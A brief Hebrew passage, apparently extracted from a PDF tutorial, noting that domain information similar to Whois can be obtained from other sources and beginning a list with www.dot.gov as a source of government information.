‫מ ל בד ‪-Whois,‬האתהי כו ל ל ק ב ל מידע דומה ע ל דומיינים שונים באמצעות האפ שרויות ה באות‪:‬‬

‫‪ 1. www.dot.gov -‬מ ספ ק מידע ע ל הממ ש לה‬